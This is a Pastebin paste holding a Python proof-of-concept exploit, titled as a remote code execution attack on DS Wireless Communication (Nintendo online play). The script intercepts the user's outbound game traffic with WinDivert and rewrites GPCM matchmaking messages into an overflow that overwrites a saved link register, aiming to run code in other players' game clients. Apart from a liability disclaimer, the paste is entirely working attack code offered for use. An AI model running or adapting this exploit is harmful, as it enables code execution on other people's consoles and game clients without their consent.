API tools faq
paste
Advertisement
Guest User

DS Wireless Communication Remote Code Execution

a guest
Nov 19th, 2023
1,012
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.40 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. """This code will inject arbitrary code into a client's game.
  2.  
  3. You are fully responsible for all activity that occurs while using this code.
  4. The author of this code can not be held liable to you or to anyone else as a
  5. result of damages caused by the usage of this code.
  6. """
  7.  
  8. __author__ = 'MikeIsAStar'
  9. __date__ = '19 Nov 2023'
  10.  
  11. import re
  12. import sys
  13.  
  14. if sys.version_info < (3, 10):
  15.     sys.exit('This program requires Python 3.10 or above !')
  16.  
  17. try:
  18.     import pydivert
  19. except ModuleNotFoundError:
  20.     sys.exit("The 'pydivert' module is not installed !")
  21.  
  22.  
  23. # Variables
  24. LR_SAVE = b'\x41\x41\x41\x41'
  25. assert len(LR_SAVE) == 0x04
  26. PADDING = b'MikeStar'
  27. assert len(PADDING) > 0x00
  28.  
  29. # Constants
  30. DWC_MATCH_COMMAND_INVALID = b'\xFE'
  31. DWC_MATCHING_VERSION_3_PADDING_LENGTH = 0x22C
  32. DWC_MATCHING_VERSION_11_PADDING_LENGTH = 0x23C
  33. FINAL_KEY = b'\\final\\'
  34. WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
  35.  
  36.  
  37. def try_modify_gpcm_message(payload):
  38.     message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
  39.     message = re.search(message_pattern, payload)
  40.     if not message:
  41.         return None
  42.  
  43.     matching_version = int(message.group(1))
  44.     match matching_version:
  45.         case 3:
  46.             padding_length = DWC_MATCHING_VERSION_3_PADDING_LENGTH
  47.         case 11:
  48.             padding_length = DWC_MATCHING_VERSION_11_PADDING_LENGTH
  49.         case 90:
  50.             print('Modifying GPCM90vMAT messages is not supported !')
  51.             return None
  52.         case _:
  53.             print(f'Modifying GPCM{matching_version}vMAT messages is not yet supported !')
  54.             return None
  55.  
  56.     payload = payload[:message.end()]
  57.     payload += DWC_MATCH_COMMAND_INVALID
  58.     payload += (PADDING * (padding_length // len(PADDING) + 1))[:padding_length]
  59.     payload += LR_SAVE
  60.     payload += FINAL_KEY
  61.  
  62.     print(f'Modified a GPCM{matching_version}vMAT message !')
  63.  
  64.     return payload
  65.  
  66.  
  67. def main():
  68.     try:
  69.         with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
  70.             for packet in packet_buffer:
  71.                 payload = try_modify_gpcm_message(packet.payload)
  72.                 if payload is not None:
  73.                     packet.payload = payload
  74.                 packet_buffer.send(packet)
  75.     except KeyboardInterrupt:
  76.         pass
  77.     except PermissionError:
  78.         sys.exit('This program must be run with administrator privileges !')
  79.  
  80.  
  81. if __name__ == '__main__':
  82.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!